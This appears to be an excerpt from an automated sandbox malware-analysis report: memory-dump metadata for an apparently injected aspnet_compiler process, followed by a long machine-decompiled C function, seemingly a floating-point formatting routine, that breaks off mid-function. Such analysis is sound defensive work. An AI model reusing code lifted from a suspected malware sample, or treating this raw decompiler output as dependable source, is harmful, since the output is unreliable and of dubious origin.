                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                • String ID: SeShutdownPrivilege
                • API String ID: 3534403312-3733053543
                • Opcode ID: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                • Instruction ID: d2a690f146848b4c7648309cf1ebff16810b1493f15ef7d05bb093e1d547c9c1
                • Opcode Fuzzy Hash: b2a577c07cd5a6e11c0a1240a119a4fb26133fa7f03a6e195252090a31f2c8a0
                • Instruction Fuzzy Hash: A2F03A71905229ABDB10ABA0ED0DAEF7FBCEF05612F1000B0B805A1092D6388A04CAF6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E004529D9(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                				signed int _v0;
                				signed int _v8;
                				char _v460;
                				signed int _v464;
                				void _v468;
                				signed int _v472;
                				signed int _v932;
                				signed int _v936;
                				signed int _v1392;
                				signed int _v1396;
                				signed int _v1400;
                				char _v1860;
                				signed int _v1864;
                				signed int _v1865;
                				signed int _v1872;
                				signed int _v1876;
                				signed int _v1880;
                				signed int _v1884;
                				signed int _v1888;
                				signed int _v1892;
                				signed int _v1896;
                				intOrPtr _v1900;
                				signed int _v1904;
                				signed int _v1908;
                				signed int _v1912;
                				signed int _v1916;
                				signed int _v1920;
                				signed int _v1924;
                				signed int _v1928;
                				char _v1936;
                				char _v1944;
                				char _v2404;
                				signed int _v2408;
                				signed int _v2424;
                				void* __edi;
                				void* __esi;
                				signed int _t725;
                				signed int _t735;
                				signed int _t736;
                				signed int _t740;
                				intOrPtr _t742;
                				intOrPtr* _t743;
                				intOrPtr* _t746;
                				signed int _t751;
                				signed int _t752;
                				signed int _t758;
                				signed int _t764;
                				intOrPtr _t766;
                				void* _t767;
                				signed int _t768;
                				signed int _t769;
                				signed int _t770;
                				signed int _t778;
                				signed int _t779;
                				signed int _t782;
                				signed int _t783;
                				signed int _t784;
                				signed int _t787;
                				signed int _t788;
                				signed int _t789;
                				signed int _t791;
                				signed int _t792;
                				signed int _t793;
                				signed int _t794;
                				signed int _t799;
                				signed int _t800;
                				signed int _t805;
                				signed int _t806;
                				signed int _t809;
                				signed int _t813;
                				signed int _t820;
                				signed int* _t823;
                				signed int _t826;
                				signed int _t837;
                				signed int _t838;
                				signed int _t840;
                				char* _t841;
                				signed int _t843;
                				signed int _t847;
                				signed int _t848;
                				signed int _t852;
                				signed int _t854;
                				signed int _t859;
                				signed int _t867;
                				signed int _t870;
                				signed int _t872;
                				signed int _t875;
                				signed int _t876;
                				signed int _t877;
                				signed int _t880;
                				signed int _t893;
                				signed int _t894;
                				signed int _t896;
                				char* _t897;
                				signed int _t899;
                				signed int _t903;
                				signed int _t904;
                				signed int* _t906;
                				signed int _t908;
                				signed int _t910;
                				signed int _t915;
                				signed int _t922;
                				signed int _t925;
                				signed int _t929;
                				signed int* _t936;
                				intOrPtr _t938;
                				void* _t939;
                				intOrPtr* _t941;
                				signed int* _t945;
                				unsigned int _t956;
                				signed int _t957;
                				void* _t960;
                				signed int _t961;
                				void* _t963;
                				signed int _t964;
                				signed int _t965;
                				signed int _t966;
                				signed int _t974;
                				signed int _t979;
                				signed int _t982;
                				unsigned int _t985;
                				signed int _t986;
                				void* _t989;
                				signed int _t990;
                				void* _t992;
                				signed int _t993;
                				signed int _t994;
                				signed int _t995;
                				signed int _t999;
                				signed int* _t1004;
                				signed int _t1006;
                				signed int _t1016;
                				void _t1019;
                				signed int _t1022;
                				void* _t1025;
                				signed int _t1036;
                				signed int _t1037;
                				signed int _t1040;
                				signed int _t1041;
                				signed int _t1043;
                				signed int _t1044;
                				signed int _t1045;
                				signed int _t1049;
                				signed int _t1053;
                				signed int _t1054;
                				signed int _t1055;
                				signed int _t1057;
                				signed int _t1058;
                				signed int _t1059;
                				signed int _t1060;
                				signed int _t1061;
                				signed int _t1062;
                				signed int _t1064;
                				signed int _t1065;
                				signed int _t1066;
                				signed int _t1067;
                				signed int _t1068;
                				signed int _t1069;
                				unsigned int _t1070;
                				void* _t1073;
                				intOrPtr _t1075;
                				signed int _t1076;
                				signed int _t1077;
                				signed int _t1078;
                				signed int* _t1082;
                				void* _t1086;
                				void* _t1087;
                				signed int _t1088;
                				signed int _t1089;
                				signed int _t1090;
                				signed int _t1093;
                				signed int _t1094;
                				signed int _t1099;
                				signed int _t1101;
                				signed int _t1104;
                				char _t1109;
                				signed int _t1111;
                				signed int _t1112;
                				signed int _t1113;
                				signed int _t1114;
                				signed int _t1115;
                				signed int _t1116;
                				signed int _t1117;
                				signed int _t1121;
                				signed int _t1122;
                				signed int _t1123;
                				signed int _t1124;
                				signed int _t1125;
                				unsigned int _t1128;
                				void* _t1132;
                				void* _t1133;
                				unsigned int _t1134;
                				signed int _t1139;
                				signed int _t1140;
                				signed int _t1142;
                				signed int _t1143;
                				intOrPtr* _t1145;
                				signed int _t1146;
                				signed int _t1147;
                				signed int _t1150;
                				signed int _t1151;
                				signed int _t1154;
                				signed int _t1156;
                				signed int _t1157;
                				void* _t1158;
                				signed int _t1159;
                				signed int _t1160;
                				signed int _t1161;
                				void* _t1164;
                				signed int _t1165;
                				signed int _t1166;
                				signed int _t1167;
                				signed int _t1168;
                				signed int _t1169;
                				signed int* _t1172;
                				signed int _t1173;
                				signed int _t1174;
                				signed int _t1175;
                				signed int _t1176;
                				intOrPtr* _t1178;
                				intOrPtr* _t1179;
                				signed int _t1181;
                				signed int _t1183;
                				signed int _t1186;
                				signed int _t1192;
                				signed int _t1196;
                				signed int _t1197;
                				intOrPtr _t1199;
                				intOrPtr _t1200;
                				signed int _t1205;
                				signed int _t1208;
                				signed int _t1209;
                				signed int _t1210;
                				signed int _t1211;
                				signed int _t1212;
                				signed int _t1213;
                				signed int _t1215;
                				signed int _t1216;
                				signed int _t1217;
                				signed int _t1218;
                				signed int _t1220;
                				signed int _t1221;
                				signed int _t1222;
                				signed int _t1223;
                				signed int _t1224;
                				signed int _t1226;
                				signed int _t1227;
                				signed int _t1229;
                				signed int _t1231;
                				signed int _t1233;
                				signed int _t1235;
                				signed int* _t1237;
                				signed int* _t1241;
                				signed int _t1250;
                
                				_t725 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t725 ^ _t1235;
                				_t1016 = _a20;
                				_t1145 = _a16;
                				_v1924 = _t1145;
                				_v1920 = _t1016;
                				E004529AF( &_v1944, __eflags);
                				_t1196 = _a8;
                				_t730 = 0x2d;
                				if((_t1196 & 0x80000000) == 0) {
                					_t730 = 0x120;
                				}
                				 *_t1145 = _t730;
                				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
                				_t1146 = _a4;
                				if((_t1196 & 0x7ff00000) != 0) {
                					L5:
                					_t735 = E004487FA( &_a4);
                					_pop(_t1031);
                					__eflags = _t735;
                					if(_t735 != 0) {
                						_t1031 = _v1924;
                						 *((intOrPtr*)(_v1924 + 4)) = 1;
                					}
                					_t736 = _t735 - 1;
                					__eflags = _t736;
                					if(_t736 == 0) {
                						_push("1#INF");
                						goto L308;
                					} else {
                						_t751 = _t736 - 1;
                						__eflags = _t751;
                						if(_t751 == 0) {
                							_push("1#QNAN");
                							goto L308;
                						} else {
                							_t752 = _t751 - 1;
                							__eflags = _t752;
                							if(_t752 == 0) {
                								_push("1#SNAN");
                								goto L308;
                							} else {
                								__eflags = _t752 == 1;
                								if(_t752 == 1) {
                									_push("1#IND");
                									goto L308;
                								} else {
                									_v1928 = _v1928 & 0x00000000;
                									_a4 = _t1146;
                									_a8 = _t1196 & 0x7fffffff;
                									_t1250 = _a4;
                									asm("fst qword [ebp-0x768]");
                									_t1150 = _v1896;
                									_v1916 = _a12 + 1;
                									_t1036 = _t1150 >> 0x14;
                									_t758 = _t1036 & 0x000007ff;
                									__eflags = _t758;
                									if(_t758 != 0) {
                										_t1101 = 0;
                										_t758 = 0;
                										__eflags = 0;
                									} else {
                										_t1101 = 1;
                									}
                									_t1151 = _t1150 & 0x000fffff;
                									_t1019 = _v1900 + _t758;
                									asm("adc edi, esi");
                									__eflags = _t1101;
                									_t1037 = _t1036 & 0x000007ff;
                									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
                									_v1872 = _t1205;
                									E004551F0(_t1037, _t1250);
                									_push(_t1037);
                									_push(_t1037);
                									 *_t1237 = _t1250;
                									_t764 = E00456080(E00455300(_t1151, _t1205), _t1250);
                									_v1904 = _t764;
                									__eflags = _t764 - 0x7fffffff;
                									if(_t764 == 0x7fffffff) {
                										L16:
                										__eflags = 0;
                										_v1904 = 0;
                									} else {
                										__eflags = _t764 - 0x80000000;
                										if(_t764 == 0x80000000) {
                											goto L16;
                										}
                									}
                									_v468 = _t1019;
                									__eflags = _t1151;
                									_v464 = _t1151;
                									_t1022 = (0 | _t1151 != 0x00000000) + 1;
                									_v472 = _t1022;
                									__eflags = _t1205;
                									if(_t1205 < 0) {
                										__eflags = _t1205 - 0xfffffc02;
                										if(_t1205 == 0xfffffc02) {
                											L101:
                											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
                											_t195 =  &_v1896;
                											 *_t195 = _v1896 & 0x00000000;
                											__eflags =  *_t195;
                											asm("bsr eax, eax");
                											if( *_t195 == 0) {
                												_t1040 = 0;
                												__eflags = 0;
                											} else {
                												_t1040 = _t766 + 1;
                											}
                											_t767 = 0x20;
                											_t768 = _t767 - _t1040;
                											__eflags = _t768 - 1;
                											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
                											__eflags = _t1022 - 0x73;
                											_v1865 = _t769;
                											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
                											__eflags = _t1022 - 0x73;
                											if(_t1022 != 0x73) {
                												L107:
                												_t770 = 0;
                												__eflags = 0;
                											} else {
                												__eflags = _t769;
                												if(_t769 == 0) {
                													goto L107;
                												} else {
                													_t770 = 1;
                												}
                											}
                											__eflags = _t1041;
                											if(_t1041 != 0) {
                												L126:
                												_v1400 = _v1400 & 0x00000000;
                												_t224 =  &_v472;
                												 *_t224 = _v472 & 0x00000000;
                												__eflags =  *_t224;
                												_push(0);
                												_push( &_v1396);
                												_push(0x1cc);
                												_push( &_v468);
                												L313();
                												_t1237 =  &(_t1237[4]);
                											} else {
                												__eflags = _t770;
                												if(_t770 != 0) {
                													goto L126;
                												} else {
                													_t1068 = 0x72;
                													__eflags = _t1022 - _t1068;
                													if(_t1022 < _t1068) {
                														_t1068 = _t1022;
                													}
                													__eflags = _t1068 - 0xffffffff;
                													if(_t1068 != 0xffffffff) {
                														_t1223 = _t1068;
                														_t1178 =  &_v468 + _t1068 * 4;
                														_v1880 = _t1178;
                														while(1) {
                															__eflags = _t1223 - _t1022;
                															if(_t1223 >= _t1022) {
                																_t208 =  &_v1876;
                																 *_t208 = _v1876 & 0x00000000;
                																__eflags =  *_t208;
                															} else {
                																_v1876 =  *_t1178;
                															}
                															_t210 = _t1223 - 1; // 0x70
                															__eflags = _t210 - _t1022;
                															if(_t210 >= _t1022) {
                																_t1128 = 0;
                																__eflags = 0;
                															} else {
                																_t1128 =  *(_t1178 - 4);
                															}
                															_t1178 = _t1178 - 4;
                															_t936 = _v1880;
                															_t1223 = _t1223 - 1;
                															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
                															_v1880 = _t936 - 4;
                															__eflags = _t1223 - 0xffffffff;
                															if(_t1223 == 0xffffffff) {
                																break;
                															}
                															_t1022 = _v472;
                														}
                														_t1205 = _v1872;
                													}
                													__eflags = _v1865;
                													if(_v1865 == 0) {
                														_v472 = _t1068;
                													} else {
                														_t218 = _t1068 + 1; // 0x73
                														_v472 = _t218;
                													}
                												}
                											}
                											_t1154 = 1 - _t1205;
                											E00435760(_t1154,  &_v1396, 0, 1);
                											__eflags = 1;
                											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
                											_t778 = 0xbadbae;
                										} else {
                											_v1396 = _v1396 & 0x00000000;
                											_t1069 = 2;
                											_v1392 = 0x100000;
                											_v1400 = _t1069;
                											__eflags = _t1022 - _t1069;
                											if(_t1022 == _t1069) {
                												_t1132 = 0;
                												__eflags = 0;
                												while(1) {
                													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
                													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
                													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
                														goto L101;
                													}
                													_t1132 = _t1132 + 4;
                													__eflags = _t1132 - 8;
                													if(_t1132 != 8) {
                														continue;
                													} else {
                														_t166 =  &_v1896;
                														 *_t166 = _v1896 & 0x00000000;
                														__eflags =  *_t166;
                														asm("bsr eax, edi");
                														if( *_t166 == 0) {
                															_t1133 = 0;
                															__eflags = 0;
                														} else {
                															_t1133 = _t938 + 1;
                														}
                														_t939 = 0x20;
                														_t1224 = _t1069;
                														__eflags = _t939 - _t1133 - _t1069;
                														_t941 =  &_v460;
                														_v1880 = _t941;
                														_t1179 = _t941;
                														_t171 =  &_v1865;
                														 *_t171 = _t939 - _t1133 - _t1069 > 0;
                														__eflags =  *_t171;
                														while(1) {
                															__eflags = _t1224 - _t1022;
                															if(_t1224 >= _t1022) {
                																_t173 =  &_v1876;
                																 *_t173 = _v1876 & 0x00000000;
                																__eflags =  *_t173;
                															} else {
                																_v1876 =  *_t1179;
                															}
                															_t175 = _t1224 - 1; // 0x0
                															__eflags = _t175 - _t1022;
                															if(_t175 >= _t1022) {
                																_t1134 = 0;
                																__eflags = 0;
                															} else {
                																_t1134 =  *(_t1179 - 4);
                															}
                															_t1179 = _t1179 - 4;
                															_t945 = _v1880;
                															_t1224 = _t1224 - 1;
                															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
                															_v1880 = _t945 - 4;
                															__eflags = _t1224 - 0xffffffff;
                															if(_t1224 == 0xffffffff) {
                																break;
                															}
                															_t1022 = _v472;
                														}
                														__eflags = _v1865;
                														_t1070 = _t1069 - _v1872;
                														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
                														_t1181 = _t1070 >> 5;
                														_v1884 = _t1070;
                														_t1226 = _t1181 << 2;
                														E00435760(_t1181,  &_v1396, 0, _t1226);
                														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
                														_t778 = _t1181 + 1;
                													}
                													goto L128;
                												}
                											}
                											goto L101;
                										}
                										L128:
                										_v1400 = _t778;
                										_t1025 = 0x1cc;
                										_v936 = _t778;
                										_t779 = _t778 << 2;
                										__eflags = _t779;
                										_push(_t779);
                										_push( &_v1396);
                										_push(0x1cc);
                										_push( &_v932);
                										L313();
                										_t1241 =  &(_t1237[7]);
                									} else {
                										_v1396 = _v1396 & 0x00000000;
                										_t1227 = 2;
                										_v1392 = 0x100000;
                										_v1400 = _t1227;
                										__eflags = _t1022 - _t1227;
                										if(_t1022 != _t1227) {
                											L53:
                											_t956 = _v1872 + 1;
                											_t957 = _t956 & 0x0000001f;
                											_t1073 = 0x20;
                											_v1876 = _t957;
                											_t1183 = _t956 >> 5;
                											_v1872 = _t1183;
                											_v1908 = _t1073 - _t957;
                											_t960 = E00456040(1, _t1073 - _t957, 0);
                											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
                											_t961 = _t960 - 1;
                											_t108 =  &_v1896;
                											 *_t108 = _v1896 & 0x00000000;
                											__eflags =  *_t108;
                											asm("bsr ecx, ecx");
                											_v1884 = _t961;
                											_v1912 =  !_t961;
                											if( *_t108 == 0) {
                												_t1076 = 0;
                												__eflags = 0;
                											} else {
                												_t1076 = _t1075 + 1;
                											}
                											_t963 = 0x20;
                											_t964 = _t963 - _t1076;
                											_t1139 = _t1022 + _t1183;
                											__eflags = _v1876 - _t964;
                											_v1892 = _t1139;
                											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
                											__eflags = _t1139 - 0x73;
                											_v1865 = _t965;
                											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
                											__eflags = _t1139 - 0x73;
                											if(_t1139 != 0x73) {
                												L59:
                												_t966 = 0;
                												__eflags = 0;
                											} else {
                												__eflags = _t965;
                												if(_t965 == 0) {
                													goto L59;
                												} else {
                													_t966 = 1;
                												}
                											}
                											__eflags = _t1077;
                											if(_t1077 != 0) {
                												L81:
                												__eflags = 0;
                												_t1025 = 0x1cc;
                												_push(0);
                												_v1400 = 0;
                												_v472 = 0;
                												_push( &_v1396);
                												_push(0x1cc);
                												_push( &_v468);
                												L313();
                												_t1237 =  &(_t1237[4]);
                											} else {
                												__eflags = _t966;
                												if(_t966 != 0) {
                													goto L81;
                												} else {
                													_t1078 = 0x72;
                													__eflags = _t1139 - _t1078;
                													if(_t1139 >= _t1078) {
                														_t1139 = _t1078;
                														_v1892 = _t1078;
                													}
                													_t974 = _t1139;
                													_v1880 = _t974;
                													__eflags = _t1139 - 0xffffffff;
                													if(_t1139 != 0xffffffff) {
                														_t1140 = _v1872;
                														_t1229 = _t1139 - _t1140;
                														__eflags = _t1229;
                														_t1082 =  &_v468 + _t1229 * 4;
                														_v1888 = _t1082;
                														while(1) {
                															__eflags = _t974 - _t1140;
                															if(_t974 < _t1140) {
                																break;
                															}
                															__eflags = _t1229 - _t1022;
                															if(_t1229 >= _t1022) {
                																_t1186 = 0;
                																__eflags = 0;
                															} else {
                																_t1186 =  *_t1082;
                															}
                															__eflags = _t1229 - 1 - _t1022;
                															if(_t1229 - 1 >= _t1022) {
                																_t979 = 0;
                																__eflags = 0;
                															} else {
                																_t979 =  *(_t1082 - 4);
                															}
                															_t982 = _v1880;
                															_t1082 = _v1888 - 4;
                															_v1888 = _t1082;
                															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
                															_t974 = _t982 - 1;
                															_t1229 = _t1229 - 1;
                															_v1880 = _t974;
                															__eflags = _t974 - 0xffffffff;
                															if(_t974 != 0xffffffff) {
                																_t1022 = _v472;
                																continue;
                															}
                															break;
                														}
                														_t1139 = _v1892;
                														_t1183 = _v1872;
                														_t1227 = 2;
                													}
                													__eflags = _t1183;
                													if(_t1183 != 0) {
                														__eflags = 0;
                														memset( &_v468, 0, _t1183 << 2);
                														_t1237 =  &(_t1237[3]);
                													}
                													__eflags = _v1865;
                													_t1025 = 0x1cc;
                													if(_v1865 == 0) {
                														_v472 = _t1139;
                													} else {
                														_v472 = _t1139 + 1;
                													}
                												}
                											}
                											_v1392 = _v1392 & 0x00000000;
                											_v1396 = _t1227;
                											_v1400 = 1;
                											_v936 = 1;
                											_push(4);
                										} else {
                											_t1086 = 0;
                											__eflags = 0;
                											while(1) {
                												__eflags =  *((intOrPtr*)(_t1235 + _t1086 - 0x570)) -  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0));
                												if( *((intOrPtr*)(_t1235 + _t1086 - 0x570)) !=  *((intOrPtr*)(_t1235 + _t1086 - 0x1d0))) {
                													goto L53;
                												}
                												_t1086 = _t1086 + 4;
                												__eflags = _t1086 - 8;
                												if(_t1086 != 8) {
                													continue;
                												} else {
                													_t985 = _v1872 + 2;
                													_t986 = _t985 & 0x0000001f;
                													_t1087 = 0x20;
                													_t1088 = _t1087 - _t986;
                													_v1888 = _t986;
                													_t1231 = _t985 >> 5;
                													_v1876 = _t1231;
                													_v1908 = _t1088;
                													_t989 = E00456040(1, _t1088, 0);
                													_v1896 = _v1896 & 0x00000000;
                													_t990 = _t989 - 1;
                													__eflags = _t990;
                													asm("bsr ecx, edi");
                													_v1884 = _t990;
                													_v1912 =  !_t990;
                													if(_t990 == 0) {
                														_t1089 = 0;
                														__eflags = 0;
                													} else {
                														_t1089 = _t1088 + 1;
                													}
                													_t992 = 0x20;
                													_t993 = _t992 - _t1089;
                													_t1142 = _t1231 + 2;
                													__eflags = _v1888 - _t993;
                													_v1880 = _t1142;
                													_t994 = _t993 & 0xffffff00 | _v1888 - _t993 > 0x00000000;
                													__eflags = _t1142 - 0x73;
                													_v1865 = _t994;
                													_t1090 = _t1089 & 0xffffff00 | _t1142 - 0x00000073 > 0x00000000;
                													__eflags = _t1142 - 0x73;
                													if(_t1142 != 0x73) {
                														L28:
                														_t995 = 0;
                														__eflags = 0;
                													} else {
                														__eflags = _t994;
                														if(_t994 == 0) {
                															goto L28;
                														} else {
                															_t995 = 1;
                														}
                													}
                													__eflags = _t1090;
                													if(_t1090 != 0) {
                														L50:
                														__eflags = 0;
                														_t1025 = 0x1cc;
                														_push(0);
                														_v1400 = 0;
                														_v472 = 0;
                														_push( &_v1396);
                														_push(0x1cc);
                														_push( &_v468);
                														L313();
                														_t1237 =  &(_t1237[4]);
                													} else {
                														__eflags = _t995;
                														if(_t995 != 0) {
                															goto L50;
                														} else {
                															_t1093 = 0x72;
                															__eflags = _t1142 - _t1093;
                															if(_t1142 >= _t1093) {
                																_t1142 = _t1093;
                																_v1880 = _t1093;
                															}
                															_t1094 = _t1142;
                															_v1892 = _t1094;
                															__eflags = _t1142 - 0xffffffff;
                															if(_t1142 != 0xffffffff) {
                																_t1143 = _v1876;
                																_t1233 = _t1142 - _t1143;
                																__eflags = _t1233;
                																_t1004 =  &_v468 + _t1233 * 4;
                																_v1872 = _t1004;
                																while(1) {
                																	__eflags = _t1094 - _t1143;
                																	if(_t1094 < _t1143) {
                																		break;
                																	}
                																	__eflags = _t1233 - _t1022;
                																	if(_t1233 >= _t1022) {
                																		_t1192 = 0;
                																		__eflags = 0;
                																	} else {
                																		_t1192 =  *_t1004;
                																	}
                																	__eflags = _t1233 - 1 - _t1022;
                																	if(_t1233 - 1 >= _t1022) {
                																		_t1006 = 0;
                																		__eflags = 0;
                																	} else {
                																		_t1006 =  *(_v1872 - 4);
                																	}
                																	_t1099 = _v1892;
                																	 *(_t1235 + _t1099 * 4 - 0x1d0) = (_t1006 & _v1912) >> _v1908 | (_t1192 & _v1884) << _v1888;
                																	_t1094 = _t1099 - 1;
                																	_t1233 = _t1233 - 1;
                																	_t1004 = _v1872 - 4;
                																	_v1892 = _t1094;
                																	_v1872 = _t1004;
                																	__eflags = _t1094 - 0xffffffff;
                																	if(_t1094 != 0xffffffff) {
                																		_t1022 = _v472;
                																		continue;
                																	}
                																	break;
                																}
                																_t1142 = _v1880;
                																_t1231 = _v1876;
                															}
                															__eflags = _t1231;
                															if(_t1231 != 0) {
                																__eflags = 0;
                																memset( &_v468, 0, _t1231 << 2);
                																_t1237 =  &(_t1237[3]);
                															}
                															__eflags = _v1865;
                															_t1025 = 0x1cc;
                															if(_v1865 == 0) {
                																_v472 = _t1142;
                															} else {
                																_v472 = _t1142 + 1;
                															}
                														}
                													}
                													_v1392 = _v1392 & 0x00000000;
                													_t999 = 4;
                													__eflags = 1;
                													_v1396 = _t999;
                													_v1400 = 1;
                													_v936 = 1;
                													_push(_t999);
                												}
                												goto L52;
                											}
                											goto L53;
                										}
                										L52:
                										_push( &_v1396);
                										_push(_t1025);
                										_push( &_v932);
                										L313();
                										_t1241 =  &(_t1237[4]);
                									}
                									_t782 = _v1904;
                									_t1043 = 0xa;
                									_v1912 = _t1043;
                									__eflags = _t782;
                									if(_t782 < 0) {
                										_t783 =  ~_t782;
                										_t784 = _t783 / _t1043;
                										_v1880 = _t784;
                										_t1044 = _t783 % _t1043;
                										_v1884 = _t1044;
                										__eflags = _t784;
                										if(_t784 == 0) {
                											L249:
                											__eflags = _t1044;
                											if(_t1044 != 0) {
                												_t820 =  *(0x45c72c + _t1044 * 4);
                												_v1896 = _t820;
                												__eflags = _t820;
                												if(_t820 == 0) {
                													L260:
                													__eflags = 0;
                													_push(0);
                													_v472 = 0;
                													_v2408 = 0;
                													goto L261;
                												} else {
                													__eflags = _t820 - 1;
                													if(_t820 != 1) {
                														_t1055 = _v472;
                														__eflags = _t1055;
                														if(_t1055 != 0) {
                															_t1161 = 0;
                															_t1213 = 0;
                															__eflags = 0;
                															do {
                																_t1113 = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) >> 0x20;
                																 *(_t1235 + _t1213 * 4 - 0x1d0) = _t820 *  *(_t1235 + _t1213 * 4 - 0x1d0) + _t1161;
                																_t820 = _v1896;
                																asm("adc edx, 0x0");
                																_t1213 = _t1213 + 1;
                																_t1161 = _t1113;
                																__eflags = _t1213 - _t1055;
                															} while (_t1213 != _t1055);
                															__eflags = _t1161;
                															if(_t1161 != 0) {
                																_t826 = _v472;
                																__eflags = _t826 - 0x73;
                																if(_t826 >= 0x73) {
                																	goto L260;
                																} else {
                																	 *(_t1235 + _t826 * 4 - 0x1d0) = _t1161;
                																	_v472 = _v472 + 1;
                																}
                															}
                														}
                													}
                												}
                											}
                										} else {
                											do {
                												__eflags = _t784 - 0x26;
                												if(_t784 > 0x26) {
                													_t784 = 0x26;
                												}
                												_t1056 =  *(0x45c696 + _t784 * 4) & 0x000000ff;
                												_v1872 = _t784;
                												_v1400 = ( *(0x45c696 + _t784 * 4) & 0x000000ff) + ( *(0x45c697 + _t784 * 4) & 0x000000ff);
                												E00435760(_t1056 << 2,  &_v1396, 0, _t1056 << 2);
                												_t837 = E004351E0( &(( &_v1396)[_t1056]), 0x45bd90 + ( *(0x45c694 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x45c697 + _t784 * 4) & 0x000000ff) << 2);
                												_t1057 = _v1400;
                												_t1241 =  &(_t1241[6]);
                												_v1892 = _t1057;
                												__eflags = _t1057 - 1;
                												if(_t1057 > 1) {
                													__eflags = _v472 - 1;
                													if(_v472 > 1) {
                														__eflags = _t1057 - _v472;
                														_t1164 =  &_v1396;
                														_t838 = _t837 & 0xffffff00 | _t1057 - _v472 > 0x00000000;
                														__eflags = _t838;
                														if(_t838 != 0) {
                															_t1114 =  &_v468;
                														} else {
                															_t1164 =  &_v468;
                															_t1114 =  &_v1396;
                														}
                														_v1908 = _t1114;
                														__eflags = _t838;
                														if(_t838 == 0) {
                															_t1057 = _v472;
                														}
                														_v1876 = _t1057;
                														__eflags = _t838;
                														if(_t838 != 0) {
                															_v1892 = _v472;
                														}
                														_t1115 = 0;
                														_t1215 = 0;
                														_v1864 = 0;
                														__eflags = _t1057;
                														if(_t1057 == 0) {
                															L243:
                															_v472 = _t1115;
                															_t840 = _t1115 << 2;
                															__eflags = _t840;
                															_push(_t840);
                															_t841 =  &_v1860;
                															goto L244;
                														} else {
                															_t1165 = _t1164 -  &_v1860;
                															__eflags = _t1165;
                															_v1928 = _t1165;
                															do {
                																_t847 =  *(_t1235 + _t1165 + _t1215 * 4 - 0x740);
                																_v1896 = _t847;
                																__eflags = _t847;
                																if(_t847 != 0) {
                																	_t848 = 0;
                																	_t1166 = 0;
                																	_t1058 = _t1215;
                																	_v1888 = 0;
                																	__eflags = _v1892;
                																	if(_v1892 == 0) {
                																		L240:
                																		__eflags = _t1058 - 0x73;
                																		if(_t1058 == 0x73) {
                																			goto L258;
                																		} else {
                																			_t1165 = _v1928;
                																			_t1057 = _v1876;
                																			goto L242;
                																		}
                																	} else {
                																		while(1) {
                																			__eflags = _t1058 - 0x73;
                																			if(_t1058 == 0x73) {
                																				goto L235;
                																			}
                																			__eflags = _t1058 - _t1115;
                																			if(_t1058 == _t1115) {
                																				 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
                																				_t859 = _t848 + 1 + _t1215;
                																				__eflags = _t859;
                																				_v1864 = _t859;
                																				_t848 = _v1888;
                																			}
                																			_t854 =  *(_v1908 + _t848 * 4);
                																			asm("adc edx, 0x0");
                																			 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t854 * _v1896 + _t1166;
                																			asm("adc edx, 0x0");
                																			_t848 = _v1888 + 1;
                																			_t1058 = _t1058 + 1;
                																			_v1888 = _t848;
                																			_t1166 = _t854 * _v1896 >> 0x20;
                																			_t1115 = _v1864;
                																			__eflags = _t848 - _v1892;
                																			if(_t848 != _v1892) {
                																				continue;
                																			} else {
                																				goto L235;
                																			}
                																			while(1) {
                																				L235:
                																				__eflags = _t1166;
                																				if(_t1166 == 0) {
                																					goto L240;
                																				}
                																				__eflags = _t1058 - 0x73;
                																				if(_t1058 == 0x73) {
                																					goto L258;
                																				} else {
                																					__eflags = _t1058 - _t1115;
                																					if(_t1058 == _t1115) {
                																						_t558 = _t1235 + _t1058 * 4 - 0x740;
                																						 *_t558 =  *(_t1235 + _t1058 * 4 - 0x740) & 0x00000000;
                																						__eflags =  *_t558;
                																						_t564 = _t1058 + 1; // 0x1
                																						_v1864 = _t564;
                																					}
                																					_t852 = _t1166;
                																					_t1166 = 0;
                																					 *(_t1235 + _t1058 * 4 - 0x740) =  *(_t1235 + _t1058 * 4 - 0x740) + _t852;
                																					_t1115 = _v1864;
                																					asm("adc edi, edi");
                																					_t1058 = _t1058 + 1;
                																					continue;
                																				}
                																				goto L246;
                																			}
                																			goto L240;
                																		}
                																		goto L235;
                																	}
                																} else {
                																	__eflags = _t1215 - _t1115;
                																	if(_t1215 == _t1115) {
                																		 *(_t1235 + _t1215 * 4 - 0x740) =  *(_t1235 + _t1215 * 4 - 0x740) & _t847;
                																		_t526 = _t1215 + 1; // 0x1
                																		_t1115 = _t526;
                																		_v1864 = _t1115;
                																	}
                																	goto L242;
                																}
